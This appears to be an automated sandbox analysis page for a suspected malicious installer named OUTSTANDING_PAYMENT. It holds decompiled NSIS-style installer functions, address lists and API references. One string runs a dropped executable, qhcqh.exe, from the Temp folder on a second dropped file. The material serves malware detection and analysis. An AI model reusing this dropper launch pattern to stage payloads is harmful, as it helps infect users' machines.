                                                                                                                        0x004059f3
                                                                                                                        0x004059f9
                                                                                                                        0x00405a34
                                                                                                                        0x00000000
                                                                                                                        0x00405a3d
                                                                                                                        0x00405a02
                                                                                                                        0x00405a07
                                                                                                                        0x00405a0a
                                                                                                                        0x00000000
                                                                                                                        0x00405a0a
                                                                                                                        0x004059f1
                                                                                                                        0x0040582a
                                                                                                                        0x0040582e
                                                                                                                        0x00405836
                                                                                                                        0x0040583a
                                                                                                                        0x0040583d
                                                                                                                        0x00405840
                                                                                                                        0x00405843
                                                                                                                        0x00405846
                                                                                                                        0x00405847
                                                                                                                        0x00405848
                                                                                                                        0x00405861
                                                                                                                        0x00405864
                                                                                                                        0x0040586e
                                                                                                                        0x0040587d
                                                                                                                        0x00405885
                                                                                                                        0x0040588d
                                                                                                                        0x00405892
                                                                                                                        0x00405895
                                                                                                                        0x004058a1
                                                                                                                        0x004058aa
                                                                                                                        0x004058b3
                                                                                                                        0x004058d5
                                                                                                                        0x004058db
                                                                                                                        0x004058ec
                                                                                                                        0x004058f1
                                                                                                                        0x004058ff
                                                                                                                        0x0040590d
                                                                                                                        0x0040590d
                                                                                                                        0x00405912
                                                                                                                        0x00405920
                                                                                                                        0x00405920
                                                                                                                        0x00405925
                                                                                                                        0x00405928
                                                                                                                        0x0040592d
                                                                                                                        0x00405939
                                                                                                                        0x00405942
                                                                                                                        0x0040594f
                                                                                                                        0x0040595e
                                                                                                                        0x00405951
                                                                                                                        0x00405956
                                                                                                                        0x00405956
                                                                                                                        0x0040596a
                                                                                                                        0x0040596a
                                                                                                                        0x0040597e
                                                                                                                        0x00405987
                                                                                                                        0x00405990
                                                                                                                        0x004059a0
                                                                                                                        0x004059ac
                                                                                                                        0x004059ac
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32 ref: 00405867
                                                                                                                        • GetDlgItem.USER32 ref: 00405876
                                                                                                                        • GetClientRect.USER32 ref: 004058B3
                                                                                                                        • GetSystemMetrics.USER32 ref: 004058BA
                                                                                                                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                                                                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                                                                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                                                                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                                                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                                                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405956
                                                                                                                        • GetDlgItem.USER32 ref: 00405977
                                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                                                                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                                                                                                        • GetDlgItem.USER32 ref: 00405885
                                                                                                                          • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                                                        • GetDlgItem.USER32 ref: 004059C9
                                                                                                                        • CreateThread.KERNEL32 ref: 004059D7
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004059DE
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00405A02
                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405A07
                                                                                                                        • ShowWindow.USER32(00000008), ref: 00405A51
                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                                                                                                        • CreatePopupMenu.USER32 ref: 00405A96
                                                                                                                        • AppendMenuW.USER32 ref: 00405AAA
                                                                                                                        • GetWindowRect.USER32 ref: 00405ACA
                                                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                                                                                                        • OpenClipboard.USER32(00000000), ref: 00405B2B
                                                                                                                        • EmptyClipboard.USER32 ref: 00405B31
                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                                                                                                        • GlobalLock.KERNEL32 ref: 00405B47
                                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                                                                                                        • SetClipboardData.USER32 ref: 00405B86
                                                                                                                        • CloseClipboard.USER32 ref: 00405B8C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                        • String ID: H7B${
                                                                                                                        • API String ID: 590372296-2256286769
                                                                                                                        • Opcode ID: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                                                                                        • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                                                                                                                        • Opcode Fuzzy Hash: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                                                                                        • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00404AB5 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 78%
                                                                                                                        			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x422720;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405CAC(0x3fb, _t146);
					E004068EF(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405CAC(0x3fb, _t146);
							if(E0040603F(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406668(0x421718, _t146);
							_t87 = E00406A35(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406668(0x421718, _t146);
								_t89 = E00405FE2(0x421718);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x421718) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405F83(0x421718);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x421718) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404F52(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
									E00404F3A(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x421708);
									} else {
										E00404E71(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a304 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004045E6(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x423738 == _t158) {
									E00404A0E();
								}
								 *0x423738 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423748;
							_v60 = E00404E0B;
							_v56 = _t146;
							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405F37(_t146);
								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\hardz\\AppData\\Local\\Temp") {
									E004066A5(_t146, 0x423748, _t167, 0, _t125);
									if(lstrcmpiW(0x428200, 0x423748) != 0) {
										lstrcatW(_t146, 0x428200);
									}
								}
								 *0x423738 =  *0x423738 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
						E00405F37(_t146);
					}
					 *0x429238 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004045C4(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004045C4(_t167);
					E004045F9(_t166);
					_t138 = E00406A35(8);
					if(_t138 == 0) {
						L53:
						return E0040462B(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                                                                                                                        0x00404ab5
                                                                                                                        0x00404abb
                                                                                                                        0x00404ac1
                                                                                                                        0x00404ace
                                                                                                                        0x00404adc
                                                                                                                        0x00404adf
                                                                                                                        0x00404ae7
                                                                                                                        0x00404aed
                                                                                                                        0x00404aed
                                                                                                                        0x00404af9
                                                                                                                        0x00404afc
                                                                                                                        0x00404b6a
                                                                                                                        0x00404b71
                                                                                                                        0x00404c48
                                                                                                                        0x00404c4f
                                                                                                                        0x00404c5e
                                                                                                                        0x00404c5e
                                                                                                                        0x00404c62
                                                                                                                        0x00404c6c
                                                                                                                        0x00404c79
                                                                                                                        0x00404c7b
                                                                                                                        0x00404c7b
                                                                                                                        0x00404c89
                                                                                                                        0x00404c90
                                                                                                                        0x00404c97
                                                                                                                        0x00404c9a
                                                                                                                        0x00404cd6
                                                                                                                        0x00404cd8
                                                                                                                        0x00404cde
                                                                                                                        0x00404ce3
                                                                                                                        0x00404ce7
                                                                                                                        0x00404ce9
                                                                                                                        0x00404ce9
                                                                                                                        0x00404d05
                                                                                                                        0x00000000
                                                                                                                        0x00404d07
                                                                                                                        0x00404d0a
                                                                                                                        0x00404d18
                                                                                                                        0x00404d1e
                                                                                                                        0x00404d1f
                                                                                                                        0x00404d22
                                                                                                                        0x00404d25
                                                                                                                        0x00000000
                                                                                                                        0x00404d25
                                                                                                                        0x00404c9c
                                                                                                                        0x00404c9e
                                                                                                                        0x00404ca2
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00404ca4
                                                                                                                        0x00404ca4
                                                                                                                        0x00404cb1
                                                                                                                        0x00404cb6
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00404cba
                                                                                                                        0x00404cbc
                                                                                                                        0x00404cbc
                                                                                                                        0x00404cc5
                                                                                                                        0x00404cc7
                                                                                                                        0x00404ccc
                                                                                                                        0x00404ccf
                                                                                                                        0x00404cd4
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00404cd4
                                                                                                                        0x00404d31
                                                                                                                        0x00404d3b
                                                                                                                        0x00404d3e
                                                                                                                        0x00404d41
                                                                                                                        0x00404d48
                                                                                                                        0x00404d48
                                                                                                                        0x00404d4a
                                                                                                                        0x00404d4a
                                                                                                                        0x00404d4f
                                                                                                                        0x00404d51
                                                                                                                        0x00404d59
                                                                                                                        0x00404d60
                                                                                                                        0x00404d62
                                                                                                                        0x00404d6d
                                                                                                                        0x00404d6d
                                                                                                                        0x00404d62
                                                                                                                        0x00404d7d
                                                                                                                        0x00404d87
                                                                                                                        0x00404d8f
                                                                                                                        0x00404daa
                                                                                                                        0x00404d91
                                                                                                                        0x00404d9a
                                                                                                                        0x00404d9a
                                                                                                                        0x00404d8f
                                                                                                                        0x00404daf
                                                                                                                        0x00404db4
                                                                                                                        0x00404db9
                                                                                                                        0x00404dc2
                                                                                                                        0x00404dc2
                                                                                                                        0x00404dcb
                                                                                                                        0x00404dcd
                                                                                                                        0x00404dcd
                                                                                                                        0x00404dd9
                                                                                                                        0x00404de1
                                                                                                                        0x00404deb
                                                                                                                        0x00404deb
                                                                                                                        0x00404df0
                                                                                                                        0x00000000
                                                                                                                        0x00404df0
                                                                                                                        0x00404c9a
                                                                                                                        0x00404c51
                                                                                                                        0x00404c58
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00404c58
                                                                                                                        0x00404b77
                                                                                                                        0x00404b80
                                                                                                                        0x00404b9a
                                                                                                                        0x00404b9f
                                                                                                                        0x00404ba9
                                                                                                                        0x00404bb0
                                                                                                                        0x00404bbc
                                                                                                                        0x00404bbf
                                                                                                                        0x00404bc2
                                                                                                                        0x00404bc9
                                                                                                                        0x00404bd1
                                                                                                                        0x00404bd4
                                                                                                                        0x00404bd8
                                                                                                                        0x00404bdf
                                                                                                                        0x00404be7
                                                                                                                        0x00404c41
                                                                                                                        0x00404be9
                                                                                                                        0x00404bea
                                                                                                                        0x00404bf1
                                                                                                                        0x00404bfb
                                                                                                                        0x00404c03
                                                                                                                        0x00404c10
                                                                                                                        0x00404c24
                                                                                                                        0x00404c28
                                                                                                                        0x00404c28
                                                                                                                        0x00404c24
                                                                                                                        0x00404c2d
                                                                                                                        0x00404c3a
                                                                                                                        0x00404c3a
                                                                                                                        0x00404be7
                                                                                                                        0x00000000
                                                                                                                        0x00404b9f
                                                                                                                        0x00404b8d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00404b93
                                                                                                                        0x00000000
                                                                                                                        0x00404afe
                                                                                                                        0x00404b0b
                                                                                                                        0x00404b14
                                                                                                                        0x00404b21
                                                                                                                        0x00404b21
                                                                                                                        0x00404b28
                                                                                                                        0x00404b2e
                                                                                                                        0x00404b37
                                                                                                                        0x00404b3a
                                                                                                                        0x00404b3d
                                                                                                                        0x00404b45
                                                                                                                        0x00404b48
                                                                                                                        0x00404b4b
                                                                                                                        0x00404b51
                                                                                                                        0x00404b58
                                                                                                                        0x00404b5f
                                                                                                                        0x00404df6
                                                                                                                        0x00404e08
                                                                                                                        0x00404b65
                                                                                                                        0x00404b68
                                                                                                                        0x00000000
                                                                                                                        0x00404b68
                                                                                                                        0x00404b5f

                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32 ref: 00404B04
                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                                                                                                        • lstrcmpiW.KERNEL32("C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z,00423748,00000000,?,?), ref: 00404C1C
                                                                                                                        • lstrcatW.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z), ref: 00404C28
                                                                                                                        • SetDlgItemTextW.USER32 ref: 00404C3A
                                                                                                                          • Part of subcall function 00405CAC: GetDlgItemTextW.USER32 ref: 00405CBF
                                                                                                                          • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                                                                          • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                                                                          • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                                                                          • Part of subcall function 004068EF: CharPrevW.USER32(?,?,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                                                                                        • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                                                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                                                                                                                          • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                                                                          • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                                                                                                          • Part of subcall function 00404E71: SetDlgItemTextW.USER32 ref: 00404F2E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                        • String ID: "C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z$A$C:\Users\user\AppData\Local\Temp$H7B
                                                                                                                        • API String ID: 2624150263-3583702251
                                                                                                                        • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                                                                                        • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                                                                                                                        • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                                                                                        • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 67%
                                                                                                                        			E004021AA() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\hardz\\AppData\\Local\\Temp");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                                                                                                                        0x004021b3
                                                                                                                        0x004021bd
                                                                                                                        0x004021c7
                                                                                                                        0x004021d1
                                                                                                                        0x004021dc
                                                                                                                        0x004021df
                                                                                                                        0x004021f9
                                                                                                                        0x004021fc
                                                                                                                        0x00402202
                                                                                                                        0x00402205
                                                                                                                        0x0040220f
                                                                                                                        0x00402213
                                                                                                                        0x00402213
                                                                                                                        0x00402218
                                                                                                                        0x00402229
                                                                                                                        0x00402231
                                                                                                                        0x004022e8
                                                                                                                        0x004022e8
                                                                                                                        0x004022ef
                                                                                                                        0x00402237
                                                                                                                        0x00402237
                                                                                                                        0x00402246
                                                                                                                        0x0040224a
                                                                                                                        0x0040224d
                                                                                                                        0x00402253
                                                                                                                        0x00402261
                                                                                                                        0x00402264
                                                                                                                        0x00402266
                                                                                                                        0x00402271
                                                                                                                        0x00402271
                                                                                                                        0x00402276
                                                                                                                        0x00402278
                                                                                                                        0x0040227f
                                                                                                                        0x0040227f
                                                                                                                        0x00402282
                                                                                                                        0x0040228b
                                                                                                                        0x0040228e
                                                                                                                        0x00402294
                                                                                                                        0x00402296
                                                                                                                        0x004022a0
                                                                                                                        0x004022a0
                                                                                                                        0x004022a3
                                                                                                                        0x004022ac
                                                                                                                        0x004022af
                                                                                                                        0x004022b8
                                                                                                                        0x004022be
                                                                                                                        0x004022c0
                                                                                                                        0x004022ce
                                                                                                                        0x004022ce
                                                                                                                        0x004022d1
                                                                                                                        0x004022d7
                                                                                                                        0x004022d7
                                                                                                                        0x004022da
                                                                                                                        0x004022e0
                                                                                                                        0x004022e6
                                                                                                                        0x004022fb
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004022e6
                                                                                                                        0x004022f1
                                                                                                                        0x00402c2d
                                                                                                                        0x00402c39

                                                                                                                        APIs
                                                                                                                        • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
